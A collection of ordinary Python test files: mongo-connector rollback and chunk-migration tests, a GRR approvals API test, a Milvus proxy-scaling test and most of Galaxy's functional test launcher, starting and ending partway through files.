db_secondary1 = self.shard1_secondary_conn["test"]["mcsharded"]
db_secondary2 = self.shard2_secondary_conn["test"]["mcsharded"]
self.assertEqual(db_secondary1.count(), 2)
# Wait for replication on the doc manager
# Note that both OplogThreads share the same doc manager
c = lambda: len(self.opman1.doc_managers[0]._search()) == 3
assert_soon(c, "not all writes were replicated to doc manager",
max_tries=120)
# Kill the new primary
self.cluster.shards[0].secondary.stop(destroy=False)
# Start both servers back up
self.cluster.shards[0].primary.start()
primary_admin = self.shard1_conn["admin"]
c = lambda: primary_admin.command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[0].secondary.start()
secondary_admin = self.shard1_secondary_conn["admin"]
c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
query = {"i": {"$lt": 1000}}
assert_soon(lambda: retry_until_ok(db_main.find(query).count) > 0)
# Only first document should exist in MongoDB
self.assertEqual(db_main.find(query).count(), 1)
self.assertEqual(db_main.find_one(query)["i"], 0)
def check_docman_rollback():
docman_docs = [d for d in self.opman1.doc_managers[0]._search()
if d["i"] < 1000]
return len(docman_docs) == 1 and docman_docs[0]["i"] == 0
assert_soon(check_docman_rollback,
"doc manager did not roll back")
# Wait for previous rollback to complete.
# Insert/delete one document to jump-start replication to secondaries
# in MongoDB 3.x.
db_main.insert_one({'i': -1})
db_main.delete_one({'i': -1})
def rollback_done():
secondary1_count = retry_until_ok(db_secondary1.count)
secondary2_count = retry_until_ok(db_secondary2.count)
return (1, 1) == (secondary1_count, secondary2_count)
assert_soon(rollback_done,
"rollback never replicated to one or more secondaries")
##############################
# Case 2: Primaries on both shards go down
self.cluster.shards[0].primary.stop(destroy=False)
self.cluster.shards[1].primary.stop(destroy=False)
# Wait for the secondaries to be promoted
shard1_secondary_admin = self.shard1_secondary_conn["admin"]
shard2_secondary_admin = self.shard2_secondary_conn["admin"]
assert_soon(
lambda: shard1_secondary_admin.command("isMaster")["ismaster"])
assert_soon(
lambda: shard2_secondary_admin.command("isMaster")["ismaster"])
# Insert another document on each shard. These will be rolled back later
retry_until_ok(db_main.insert_one, {"i": 1})
self.assertEqual(db_secondary1.count(), 2)
retry_until_ok(db_main.insert_one, {"i": 1001})
self.assertEqual(db_secondary2.count(), 2)
# Wait for replication on the doc manager
c = lambda: len(self.opman1.doc_managers[0]._search()) == 4
assert_soon(c, "not all writes were replicated to doc manager")
# Kill the new primaries
self.cluster.shards[0].secondary.stop(destroy=False)
self.cluster.shards[1].secondary.stop(destroy=False)
# Start the servers back up...
# Shard 1
self.cluster.shards[0].primary.start()
c = lambda: self.shard1_conn['admin'].command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[0].secondary.start()
secondary_admin = self.shard1_secondary_conn["admin"]
c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
# Shard 2
self.cluster.shards[1].primary.start()
c = lambda: self.shard2_conn['admin'].command("isMaster")["ismaster"]
assert_soon(lambda: retry_until_ok(c))
self.cluster.shards[1].secondary.start()
secondary_admin = self.shard2_secondary_conn["admin"]
c = lambda: secondary_admin.command("replSetGetStatus")["myState"] == 2
assert_soon(c)
# Wait for the shards to come online
assert_soon(lambda: retry_until_ok(db_main.find(query).count) > 0)
query2 = {"i": {"$gte": 1000}}
assert_soon(lambda: retry_until_ok(db_main.find(query2).count) > 0)
# Only first documents should exist in MongoDB
self.assertEqual(db_main.find(query).count(), 1)
self.assertEqual(db_main.find_one(query)["i"], 0)
self.assertEqual(db_main.find(query2).count(), 1)
self.assertEqual(db_main.find_one(query2)["i"], 1000)
# Same should hold for the doc manager
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 2)
i_values = [d["i"] for d in self.opman1.doc_managers[0]._search()]
self.assertIn(0, i_values)
self.assertIn(1000, i_values)
def test_with_chunk_migration(self):
"""Test that DocManagers have proper state after both a successful
and an unsuccessful chunk migration
"""
# Start replicating to dummy doc managers
self.opman1.start()
self.opman2.start()
collection = self.mongos_conn["test"]["mcsharded"]
for i in range(1000):
collection.insert_one({"i": i + 500})
# Assert current state of the mongoverse
self.assertEqual(self.shard1_conn["test"]["mcsharded"].find().count(),
500)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].find().count(),
500)
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 1000)
# Test successful chunk move from shard 1 to shard 2
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to="demo-set-1"
)
# doc manager should still have all docs
all_docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(all_docs), 1000)
for i, doc in enumerate(sorted(all_docs, key=lambda x: x["i"])):
self.assertEqual(doc["i"], i + 500)
# Mark the collection as "dropped". This will cause migration to fail.
self.mongos_conn["config"]["collections"].update_one(
{"_id": "test.mcsharded"},
{"$set": {"dropped": True}}
)
# Test unsuccessful chunk move from shard 2 to shard 1
def fail_to_move_chunk():
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1},
to="demo-set-0"
)
self.assertRaises(pymongo.errors.OperationFailure, fail_to_move_chunk)
# doc manager should still have all docs
all_docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(all_docs), 1000)
for i, doc in enumerate(sorted(all_docs, key=lambda x: x["i"])):
self.assertEqual(doc["i"], i + 500)
def test_with_orphan_documents(self):
"""Test that DocManagers have proper state after a chunk migration
that resuts in orphaned documents.
"""
# Start replicating to dummy doc managers
self.opman1.start()
self.opman2.start()
collection = self.mongos_conn["test"]["mcsharded"]
collection.insert_many([{"i": i + 500} for i in range(1000)])
# Assert current state of the mongoverse
self.assertEqual(self.shard1_conn["test"]["mcsharded"].find().count(),
500)
self.assertEqual(self.shard2_conn["test"]["mcsharded"].find().count(),
500)
assert_soon(lambda: len(self.opman1.doc_managers[0]._search()) == 1000)
# Stop replication using the 'rsSyncApplyStop' failpoint
self.shard1_conn.admin.command(
"configureFailPoint", "rsSyncApplyStop",
mode="alwaysOn"
)
# Move a chunk from shard2 to shard1
def move_chunk():
try:
self.mongos_conn["admin"].command(
"moveChunk",
"test.mcsharded",
find={"i": 1000},
to="demo-set-0"
)
except pymongo.errors.OperationFailure:
pass
# moveChunk will never complete, so use another thread to continue
mover = threading.Thread(target=move_chunk)
mover.start()
# wait for documents to start moving to shard 1
assert_soon(lambda: self.shard1_conn.test.mcsharded.count() > 500)
# Get opid for moveChunk command
operations = self.mongos_conn.test.current_op()
opid = None
for op in operations["inprog"]:
if op.get("query", {}).get("moveChunk"):
opid = op["opid"]
if opid is None:
raise SkipTest("could not find moveChunk operation, cannot test "
"failed moveChunk")
# Kill moveChunk with the opid
if self.mongos_conn.server_info()['versionArray'][:3] >= [3, 1, 2]:
self.mongos_conn.admin.command('killOp', op=opid)
else:
self.mongos_conn["test"]["$cmd.sys.killop"].find_one({"op": opid})
# Mongo Connector should not become confused by unsuccessful chunk move
docs = self.opman1.doc_managers[0]._search()
self.assertEqual(len(docs), 1000)
self.assertEqual(sorted(d["i"] for d in docs),
list(range(500, 1500)))
self.shard1_conn.admin.command(
"configureFailPoint", "rsSyncApplyStop",
mode="off"
)
# cleanup
mover.join()
def test_upgrade_oplog_progress(self):
first_oplog_ts1 = self.opman1.oplog.find_one()['ts']
first_oplog_ts2 = self.opman2.oplog.find_one()['ts']
# Old format oplog progress file:
progress = {
str(self.opman1.oplog): bson_ts_to_long(first_oplog_ts1),
str(self.opman2.oplog): bson_ts_to_long(first_oplog_ts2)
}
# Set up oplog managers to use the old format.
oplog_progress = LockingDict()
oplog_progress.dict = progress
self.opman1.oplog_progress = oplog_progress
self.opman2.oplog_progress = oplog_progress
# Cause the oplog managers to update their checkpoints.
self.opman1.checkpoint = first_oplog_ts1
self.opman2.checkpoint = first_oplog_ts2
self.opman1.update_checkpoint()
self.opman2.update_checkpoint()
# New format should be in place now.
new_format = {
self.opman1.replset_name: first_oplog_ts1,
self.opman2.replset_name: first_oplog_ts2
}
self.assertEqual(
new_format,
self.opman1.oplog_progress.get_dict()
)
self.assertEqual(
new_format,
self.opman2.oplog_progress.get_dict()
)
if __name__ == '__main__':
unittest.main()
|
approvals_test.py
|
#!/usr/bin/env python
"""Tests for API client and approvals-related API calls."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
import threading
import time
from absl import app
from grr_response_core.lib.util import compatibility
from grr_response_server.gui import api_auth_manager
from grr_response_server.gui import api_call_router_with_approval_checks
from grr_response_server.gui import api_integration_test_lib
from grr.test_lib import hunt_test_lib
from grr.test_lib import test_lib
class ApiClientLibApprovalsTest(api_integration_test_lib.ApiIntegrationTest,
hunt_test_lib.StandardHuntTestMixin):
def setUp(self):
super(ApiClientLibApprovalsTest, self).setUp()
cls = api_call_router_with_approval_checks.ApiCallRouterWithApprovalChecks
cls.ClearCache()
config_overrider = test_lib.ConfigOverrider(
{"API.DefaultRouter": compatibility.GetName(cls)})
config_overrider.Start()
self.addCleanup(config_overrider.Stop)
# Force creation of new APIAuthorizationManager, so that configuration
# changes are picked up.
api_auth_manager.InitializeApiAuthManager()
def testCreateClientApproval(self):
client_id = self.SetupClient(0)
approval = self.api.Client(client_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertEqual(approval.client_id, client_id)
self.assertEqual(approval.data.subject.client_id, client_id)
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilClientApprovalValid(self):
client_id = self.SetupClient(0)
approval = self.api.Client(client_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantClientApproval(
client_id,
requestor=self.token.username,
approval_id=approval.approval_id,
approver=u"foo")
thread = threading.Thread(name="ProcessApprover", target=ProcessApproval)
thread.start()
try:
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
finally:
thread.join()
def testCreateHuntApproval(self):
h_id = self.StartHunt()
approval = self.api.Hunt(h_id).CreateApproval(
reason="blah", notified_users=[u"foo"])
self.assertEqual(approval.hunt_id, h_id)
self.assertEqual(approval.data.subject.hunt_id, h_id)
self.assertEqual(approval.data.reason, "blah")
self.assertFalse(approval.data.is_valid)
def testWaitUntilHuntApprovalValid(self):
h_id = self.StartHunt()
approval = self.api.Hunt(h_id).CreateApproval(
reason="blah", notified_users=[u"approver"])
self.assertFalse(approval.data.is_valid)
def ProcessApproval():
time.sleep(1)
self.GrantHuntApproval(
h_id,
requestor=self.token.username,
approval_id=approval.approval_id,
approver=u"approver")
ProcessApproval()
thread = threading.Thread(name="HuntApprover", target=ProcessApproval)
thread.start()
try:
result_approval = approval.WaitUntilValid()
self.assertTrue(result_approval.data.is_valid)
finally:
thread.join()
def main(argv):
test_lib.main(argv)
if __name__ == "__main__":
app.run(main)
|
test_proxy_scale.py
|
import multiprocessing
import pytest
from customize.milvus_operator import MilvusOperator
from common import common_func as cf
from common.common_type import CaseLabel
from scale import scale_common as sc, constants
from utils.util_log import test_log as log
from utils.util_k8s import wait_pods_ready, export_pod_logs
from utils.util_pymilvus import get_latest_tag
prefix = "proxy_scale"
class TestProxyScale:
def e2e_milvus_parallel(self, process_num, host, c_name):
process_list = []
for i in range(process_num):
p = multiprocessing.Process(target=sc.e2e_milvus, args=(host, c_name))
p.start()
process_list.append(p)
for p in process_list:
p.join()
@pytest.mark.tags(CaseLabel.L3)
def test_scale_proxy(self):
"""
target: test milvus operation after proxy expand
method: 1.deploy 1 proxy replicas
2.milvus e2e test in parallel
3.expand proxy pod from 1 to 5
4.milvus e2e test
5.shrink proxy from 5 to 2
expected: 1.verify data consistent and func work
"""
# deploy milvus cluster with one proxy
release_name = "scale-proxy"
image_tag = get_latest_tag()
image = f'{constants.IMAGE_REPOSITORY}:{image_tag}'
data_config = {
'metadata.namespace': constants.NAMESPACE,
'metadata.name': release_name,
'spec.components.image': image,
'spec.components.proxy.serviceType': 'LoadBalancer',
'spec.components.proxy.replicas': 1,
'spec.components.dataNode.replicas': 2,
'spec.config.dataCoord.enableCompaction': True,
'spec.config.dataCoord.enableGarbageCollection': True
}
mic = MilvusOperator()
mic.install(data_config)
healthy = mic.wait_for_healthy(release_name, constants.NAMESPACE, timeout=1200)
log.info(f"milvus healthy: {healthy}")
host = mic.endpoint(release_name, constants.NAMESPACE).split(':')[0]
# host = "10.98.0.7"
try:
c_name = cf.gen_unique_str(prefix)
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test before expand')
# expand proxy replicas from 1 to 5
mic.upgrade(release_name, {'spec.components.proxy.replicas': 5}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(5, host, c_name)
log.info('Milvus test after expand')
# expand proxy replicas from 5 to 2
mic.upgrade(release_name, {'spec.components.proxy.replicas': 2}, constants.NAMESPACE)
wait_pods_ready(constants.NAMESPACE, f"app.kubernetes.io/instance={release_name}")
self.e2e_milvus_parallel(2, host, c_name)
log.info('Milvus test after shrink')
except Exception as e:
raise Exception(str(e))
finally:
label = f"app.kubernetes.io/instance={release_name}"
log.info('Start to export milvus pod logs')
export_pod_logs(namespace=constants.NAMESPACE, label_selector=label, release_name=release_name)
mic.uninstall(release_name, namespace=constants.NAMESPACE)
|
functional_tests.py
|
#!/usr/bin/env python
import os
import re
import shutil
import sys
import tempfile
from ConfigParser import SafeConfigParser
# Assume we are run from the galaxy root directory, add lib to the python path
cwd = os.getcwd()
new_path = [ os.path.join( cwd, "lib" ), os.path.join( cwd, "test" ) ]
new_path.extend( sys.path[1:] )
sys.path = new_path
from base.test_logging import logging_config_file
from base.tool_shed_util import parse_tool_panel_config
from galaxy.util.properties import load_app_properties
import logging
import os.path
import time
import threading
import random
import httplib
import socket
import urllib
from paste import httpserver
from galaxy.app import UniverseApplication
from galaxy.web import buildapp
from galaxy import tools
from galaxy.util.json import dumps
from functional import database_contexts
from base.api_util import get_master_api_key
from base.api_util import get_user_api_key
from base.nose_util import run
from base.instrument import StructuredTestDataPlugin
import nose.core
import nose.config
import nose.loader
import nose.plugins.manager
log = logging.getLogger( "functional_tests.py" )
default_galaxy_test_host = "localhost"
default_galaxy_test_port_min = 8000
default_galaxy_test_port_max = 9999
default_galaxy_locales = 'en'
default_galaxy_test_file_dir = "test-data,https://github.com/galaxyproject/galaxy-test-data.git"
migrated_tool_panel_config = 'config/migrated_tools_conf.xml'
installed_tool_panel_configs = [
os.environ.get('GALAXY_TEST_SHED_TOOL_CONF', 'config/shed_tool_conf.xml')
]
# should this serve static resources (scripts, images, styles, etc.)
STATIC_ENABLED = True
# Set up a job_conf.xml that explicitly limits jobs to 10 minutes.
job_conf_xml = '''<?xml version="1.0"?>
<!-- A test job config that explicitly configures job running the way it is configured by default (if there is no explicit config). -->
<job_conf>
<plugins>
<plugin id="local" type="runner" load="galaxy.jobs.runners.local:LocalJobRunner" workers="4"/>
</plugins>
<handlers>
<handler id="main"/>
</handlers>
<destinations>
<destination id="local" runner="local"/>
</destinations>
<limits>
<limit type="walltime">00:10:00</limit>
</limits>
</job_conf>
'''
def get_static_settings():
"""Returns dictionary of the settings necessary for a galaxy App
to be wrapped in the static middleware.
This mainly consists of the filesystem locations of url-mapped
static resources.
"""
cwd = os.getcwd()
static_dir = os.path.join( cwd, 'static' )
# TODO: these should be copied from config/galaxy.ini
return dict(
# TODO: static_enabled needed here?
static_enabled=True,
static_cache_time=360,
static_dir=static_dir,
static_images_dir=os.path.join( static_dir, 'images', '' ),
static_favicon_dir=os.path.join( static_dir, 'favicon.ico' ),
static_scripts_dir=os.path.join( static_dir, 'scripts', '' ),
static_style_dir=os.path.join( static_dir, 'june_2007_style', 'blue' ),
static_robots_txt=os.path.join( static_dir, 'robots.txt' ),
)
def get_webapp_global_conf():
"""Get the global_conf dictionary sent as the first argument to app_factory.
"""
# (was originally sent 'dict()') - nothing here for now except static settings
global_conf = dict()
if STATIC_ENABLED:
global_conf.update( get_static_settings() )
return global_conf
def generate_config_file( input_filename, output_filename, config_items ):
'''
Generate a config file with the configuration that has been defined for the embedded web application.
This is mostly relevant when setting metadata externally, since the script for doing that does not
have access to app.config.
'''
cp = SafeConfigParser()
cp.read( input_filename )
config_items_by_section = []
for label, value in config_items:
found = False
# Attempt to determine the correct section for this configuration option.
for section in cp.sections():
if cp.has_option( section, label ):
config_tuple = section, label, value
config_items_by_section.append( config_tuple )
found = True
continue
# Default to app:main if no section was found.
if not found:
config_tuple = 'app:main', label, value
config_items_by_section.append( config_tuple )
print( config_items_by_section )
# Replace the default values with the provided configuration.
for section, label, value in config_items_by_section:
if cp.has_option( section, label ):
cp.remove_option( section, label )
cp.set( section, label, str( value ) )
fh = open( output_filename, 'w' )
cp.write( fh )
fh.close()
def run_tests( test_config ):
return run( test_config )
def __copy_database_template( source, db_path ):
"""
Copy a 'clean' sqlite template database (from file or URL) to specified
database path.
"""
os.makedirs( os.path.dirname( db_path ) )
if os.path.exists( source ):
shutil.copy( source, db_path )
assert os.path.exists( db_path )
elif source.lower().startswith( ( "http://", "https://", "ftp://" ) ):
urllib.urlretrieve( source, db_path )
else:
raise Exception( "Failed to copy database template from source %s" % source )
def main():
# ---- Configuration ------------------------------------------------------
galaxy_test_host = os.environ.get( 'GALAXY_TEST_HOST', default_galaxy_test_host )
galaxy_test_port = os.environ.get( 'GALAXY_TEST_PORT', None )
galaxy_test_save = os.environ.get( 'GALAXY_TEST_SAVE', None)
tool_path = os.environ.get( 'GALAXY_TEST_TOOL_PATH', 'tools' )
if 'HTTP_ACCEPT_LANGUAGE' not in os.environ:
os.environ[ 'HTTP_ACCEPT_LANGUAGE' ] = default_galaxy_locales
testing_migrated_tools = __check_arg( '-migrated' )
testing_installed_tools = __check_arg( '-installed' )
datatypes_conf_override = None
if testing_migrated_tools or testing_installed_tools:
# Store a jsonified dictionary of tool_id : GALAXY_TEST_FILE_DIR pairs.
galaxy_tool_shed_test_file = 'shed_tools_dict'
# We need the upload tool for functional tests, so we'll create a temporary tool panel config that defines it.
fd, tmp_tool_panel_conf = tempfile.mkstemp()
os.write( fd, '<?xml version="1.0"?>\n' )
os.write( fd, '<toolbox>\n' )
os.write( fd, '<tool file="data_source/upload.xml"/>\n' )
os.write( fd, '</toolbox>\n' )
os.close( fd )
tool_config_file = tmp_tool_panel_conf
galaxy_test_file_dir = None
library_import_dir = None
user_library_import_dir = None
# Exclude all files except test_toolbox.py.
ignore_files = ( re.compile( r'^test_[adghlmsu]*' ), re.compile( r'^test_ta*' ) )
else:
framework_tool_dir = os.path.join('test', 'functional', 'tools')
framework_test = __check_arg( '-framework' ) # Run through suite of tests testing framework.
if framework_test:
tool_conf = os.path.join( framework_tool_dir, 'samples_tool_conf.xml' )
datatypes_conf_override = os.path.join( framework_tool_dir, 'sample_datatypes_conf.xml' )
else:
# Use tool_conf.xml toolbox.
tool_conf = None
if __check_arg( '-with_framework_test_tools' ):
tool_conf = "%s,%s" % ( 'config/tool_conf.xml.sample', os.path.join( framework_tool_dir, 'samples_tool_conf.xml' ) )
test_dir = default_galaxy_test_file_dir
tool_config_file = os.environ.get( 'GALAXY_TEST_TOOL_CONF', tool_conf )
galaxy_test_file_dir = os.environ.get( 'GALAXY_TEST_FILE_DIR', test_dir )
first_test_file_dir = galaxy_test_file_dir.split(",")[0]
if not os.path.isabs( first_test_file_dir ):
first_test_file_dir = os.path.join( os.getcwd(), first_test_file_dir )
library_import_dir = first_test_file_dir
import_dir = os.path.join( first_test_file_dir, 'users' )
if os.path.exists(import_dir):
user_library_import_dir = import_dir
else:
user_library_import_dir = None
ignore_files = ()
start_server = 'GALAXY_TEST_EXTERNAL' not in os.environ
tool_data_table_config_path = None
if os.path.exists( 'tool_data_table_conf.test.xml' ):
# If explicitly defined tables for test, use those.
tool_data_table_config_path = 'tool_data_table_conf.test.xml'
else:
# ... otherise find whatever Galaxy would use as the default and
# the sample data for fucntional tests to that.
default_tool_data_config = 'config/tool_data_table_conf.xml.sample'
for tool_data_config in ['config/tool_data_table_conf.xml', 'tool_data_table_conf.xml' ]:
if os.path.exists( tool_data_config ):
default_tool_data_config = tool_data_config
tool_data_table_config_path = '%s,test/functional/tool-data/sample_tool_data_tables.xml' % default_tool_data_config
default_data_manager_config = 'config/data_manager_conf.xml.sample'
for data_manager_config in ['config/data_manager_conf.xml', 'data_manager_conf.xml' ]:
if os.path.exists( data_manager_config ):
default_data_manager_config = data_manager_config
data_manager_config_file = "%s,test/functional/tools/sample_data_manager_conf.xml" % default_data_manager_config
shed_tool_data_table_config = 'config/shed_tool_data_table_conf.xml'
tool_dependency_dir = os.environ.get( 'GALAXY_TOOL_DEPENDENCY_DIR', None )
use_distributed_object_store = os.environ.get( 'GALAXY_USE_DISTRIBUTED_OBJECT_STORE', False )
galaxy_test_tmp_dir = os.environ.get( 'GALAXY_TEST_TMP_DIR', None )
if galaxy_test_tmp_dir is None:
galaxy_test_tmp_dir = tempfile.mkdtemp()
galaxy_job_conf_file = os.environ.get( 'GALAXY_TEST_JOB_CONF',
os.path.join( galaxy_test_tmp_dir, 'test_job_conf.xml' ) )
# Generate the job_conf.xml file.
file( galaxy_job_conf_file, 'w' ).write( job_conf_xml )
database_auto_migrate = False
galaxy_test_proxy_port = None
if start_server:
tempdir = tempfile.mkdtemp( dir=galaxy_test_tmp_dir )
# Configure the database path.
if 'GALAXY_TEST_DBPATH' in os.environ:
galaxy_db_path = os.environ[ 'GALAXY_TEST_DBPATH' ]
else:
galaxy_db_path = os.path.join( tempdir, 'database' )
# Configure the paths Galaxy needs to test tools.
file_path = os.path.join( galaxy_db_path, 'files' )
template_cache_path = os.path.join( galaxy_db_path, 'compiled_templates' )
new_file_path = tempfile.mkdtemp( prefix='new_files_path_', dir=tempdir )
job_working_directory = tempfile.mkdtemp( prefix='job_working_directory_', dir=tempdir )
install_database_connection = os.environ.get( 'GALAXY_TEST_INSTALL_DBURI', None )
if 'GALAXY_TEST_DBURI' in os.environ:
database_connection = os.environ['GALAXY_TEST_DBURI']
else:
db_path = os.path.join( galaxy_db_path, 'universe.sqlite' )
if 'GALAXY_TEST_DB_TEMPLATE' in os.environ:
# Middle ground between recreating a completely new
# database and pointing at existing database with
# GALAXY_TEST_DBURI. The former requires a lot of setup
# time, the latter results in test failures in certain
# cases (namely tool shed tests expecting clean database).
log.debug( "Copying database template from %s.", os.environ['GALAXY_TEST_DB_TEMPLATE'] )
__copy_database_template(os.environ['GALAXY_TEST_DB_TEMPLATE'], db_path)
database_auto_migrate = True
database_connection = 'sqlite:///%s' % db_path
kwargs = {}
for dir in file_path, new_file_path, template_cache_path:
try:
if not os.path.exists( dir ):
os.makedirs( dir )
except OSError:
pass
# Data Manager testing temp path
# For storing Data Manager outputs and .loc files so that real ones don't get clobbered
data_manager_test_tmp_path = tempfile.mkdtemp( prefix='data_manager_test_tmp', dir=galaxy_test_tmp_dir )
galaxy_data_manager_data_path = tempfile.mkdtemp( prefix='data_manager_tool-data', dir=data_manager_test_tmp_path )
# ---- Build Application --------------------------------------------------
master_api_key = get_master_api_key()
app = None
if start_server:
kwargs = dict( admin_users='test@bx.psu.edu',
api_allow_run_as='test@bx.psu.edu',
allow_library_path_paste=True,
allow_user_creation=True,
allow_user_deletion=True,
database_connection=database_connection,
database_auto_migrate=database_auto_migrate,
datatype_converters_config_file="datatype_converters_conf.xml.sample",
file_path=file_path,
id_secret='changethisinproductiontoo',
job_queue_workers=5,
job_working_directory=job_working_directory,
library_import_dir=library_import_dir,
log_destination="stdout",
new_file_path=new_file_path,
template_cache_path=template_cache_path,
running_functional_tests=True,
shed_tool_data_table_config=shed_tool_data_table_config,
template_path="templates",
test_conf="test.conf",
tool_config_file=tool_config_file,
tool_data_table_config_path=tool_data_table_config_path,
tool_path=tool_path,
galaxy_data_manager_data_path=galaxy_data_manager_data_path,
tool_parse_help=False,
update_integrated_tool_panel=False,
use_heartbeat=False,
user_library_import_dir=user_library_import_dir,
master_api_key=master_api_key,
use_tasked_jobs=True,
check_migrate_tools=False,
cleanup_job='onsuccess',
enable_beta_tool_formats=True,
auto_configure_logging=logging_config_file is None,
data_manager_config_file=data_manager_config_file )
if install_database_connection is not None:
kwargs[ 'install_database_connection' ] = install_database_connection
if not database_connection.startswith( 'sqlite://' ):
kwargs[ 'database_engine_option_max_overflow' ] = '20'
kwargs[ 'database_engine_option_pool_size' ] = '10'
if tool_dependency_dir is not None:
kwargs[ 'tool_dependency_dir' ] = tool_dependency_dir
if use_distributed_object_store:
kwargs[ 'object_store' ] = 'distributed'
kwargs[ 'distributed_object_store_config_file' ] = 'distributed_object_store_conf.xml.sample'
if datatypes_conf_override:
kwargs[ 'datatypes_config_file' ] = datatypes_conf_override
# If the user has passed in a path for the .ini file, do not overwrite it.
galaxy_config_file = os.environ.get( 'GALAXY_TEST_INI_FILE', None )
if not galaxy_config_file:
galaxy_config_file = os.path.join( galaxy_test_tmp_dir, 'functional_tests_wsgi.ini' )
config_items = []
for label in kwargs:
config_tuple = label, kwargs[ label ]
config_items.append( config_tuple )
# Write a temporary file, based on config/galaxy.ini.sample, using the configuration options defined above.
generate_config_file( 'config/galaxy.ini.sample', galaxy_config_file, config_items )
# Set the global_conf[ '__file__' ] option to the location of the temporary .ini file, which gets passed to set_metadata.sh.
kwargs[ 'global_conf' ] = get_webapp_global_conf()
kwargs[ 'global_conf' ][ '__file__' ] = galaxy_config_file
kwargs[ 'config_file' ] = galaxy_config_file
kwargs = load_app_properties(
kwds=kwargs
)
# Build the Universe Application
app = UniverseApplication( **kwargs )
database_contexts.galaxy_context = app.model.context
log.info( "Embedded Universe application started" )
# ---- Run webserver ------------------------------------------------------
server = None
if start_server:
webapp = buildapp.app_factory( kwargs[ 'global_conf' ], app=app,
use_translogger=False, static_enabled=STATIC_ENABLED )
if galaxy_test_port is not None:
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
else:
random.seed()
for i in range( 0, 9 ):
try:
galaxy_test_port = str( random.randint( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
log.debug( "Attempting to serve app on randomly chosen port: %s" % galaxy_test_port )
server = httpserver.serve( webapp, host=galaxy_test_host, port=galaxy_test_port, start_loop=False )
break
except socket.error, e:
if e[0] == 98:
continue
raise
else:
raise Exception( "Unable to open a port between %s and %s to start Galaxy server" % ( default_galaxy_test_port_min, default_galaxy_test_port_max ) )
if galaxy_test_proxy_port:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_proxy_port
else:
os.environ['GALAXY_TEST_PORT'] = galaxy_test_port
t = threading.Thread( target=server.serve_forever )
t.start()
# Test if the server is up
for i in range( 10 ):
conn = httplib.HTTPConnection( galaxy_test_host, galaxy_test_port ) # directly test the app, not the proxy
conn.request( "GET", "/" )
if conn.getresponse().status == 200:
break
time.sleep( 0.1 )
else:
raise Exception( "Test HTTP server did not return '200 OK' after 10 tries" )
log.info( "Embedded web server started" )
# ---- Find tests ---------------------------------------------------------
if galaxy_test_proxy_port:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_proxy_port ) )
else:
log.info( "Functional tests will be run against %s:%s" % ( galaxy_test_host, galaxy_test_port ) )
success = False
try:
tool_configs = app.config.tool_configs
# What requires these? Handy for (eg) functional tests to save outputs?
if galaxy_test_save:
os.environ[ 'GALAXY_TEST_SAVE' ] = galaxy_test_save
# Pass in through script setenv, will leave a copy of ALL test validate files
os.environ[ 'GALAXY_TEST_HOST' ] = galaxy_test_host
def _run_functional_test( testing_shed_tools=None ):
workflow_test = __check_arg( '-workflow', param=True )
if workflow_test:
import functional.workflow
functional.workflow.WorkflowTestCase.workflow_test_file = workflow_test
functional.workflow.WorkflowTestCase.master_api_key = master_api_key
functional.workflow.WorkflowTestCase.user_api_key = get_user_api_key()
data_manager_test = __check_arg( '-data_managers', param=False )
if data_manager_test:
import functional.test_data_managers
functional.test_data_managers.data_managers = app.data_managers # seems like a hack...
functional.test_data_managers.build_tests(
tmp_dir=data_manager_test_tmp_path,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
else:
# We must make sure that functional.test_toolbox is always imported after
# database_contexts.galaxy_content is set (which occurs in this method above).
# If functional.test_toolbox is imported before database_contexts.galaxy_content
# is set, sa_session will be None in all methods that use it.
import functional.test_toolbox
functional.test_toolbox.toolbox = app.toolbox
# When testing data managers, do not test toolbox.
functional.test_toolbox.build_tests(
app=app,
testing_shed_tools=testing_shed_tools,
master_api_key=master_api_key,
user_api_key=get_user_api_key(),
)
test_config = nose.config.Config( env=os.environ, ignoreFiles=ignore_files, plugins=nose.plugins.manager.DefaultPluginManager() )
test_config.plugins.addPlugin( StructuredTestDataPlugin() )
test_config.configure( sys.argv )
result = run_tests( test_config )
success = result.wasSuccessful()
return success
if testing_migrated_tools or testing_installed_tools:
shed_tools_dict = {}
if testing_migrated_tools:
has_test_data, shed_tools_dict = parse_tool_panel_config( migrated_tool_panel_config, shed_tools_dict )
elif testing_installed_tools:
for shed_tool_config in installed_tool_panel_configs:
has_test_data, shed_tools_dict = parse_tool_panel_config( shed_tool_config, shed_tools_dict )
# Persist the shed_tools_dict to the galaxy_tool_shed_test_file.
shed_tools_file = open( galaxy_tool_shed_test_file, 'w' )
shed_tools_file.write( dumps( shed_tools_dict ) )
shed_tools_file.close()
if not os.path.isabs( galaxy_tool_shed_test_file ):
galaxy_tool_shed_test_file = os.path.join( os.getcwd(), galaxy_tool_shed_test_file )
os.environ[ 'GALAXY_TOOL_SHED_TEST_FILE' ] = galaxy_tool_shed_test_file
if testing_installed_tools:
# Eliminate the migrated_tool_panel_config from the app's tool_configs, append the list of installed_tool_panel_configs,
